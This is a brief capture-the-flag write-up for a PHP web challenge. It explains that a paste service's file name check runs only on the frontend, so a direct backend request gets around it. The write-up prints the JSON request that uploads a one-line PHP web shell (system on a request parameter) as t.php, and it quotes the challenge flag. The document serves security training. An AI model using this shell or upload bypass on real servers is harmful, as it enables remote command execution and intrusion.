SCS [Web]
We uncovered a code repository and it appears to be where ARIA is storing mission-critical code. We need to break in!
https://uscybercombine-s4-scs.chals.io/arrow-up-right
Uploaded files are placed in /uploads directory
/uploads
The technology used is PHP
The frontend restricts using special characters:
But making direct request to backend it's bypassed:
Upload shell:
It works:
After some enumeration we find location of real flag.txt
Flag: SIVBGR{v@lidate_s3rver_s1de}
Last updated 8 months ago
Paste file name can only contain alphanumeric characters
{ "pasteContent": "<?PHP echo system($_REQUEST[0]); ?>", "pasteFileName":"t.php" }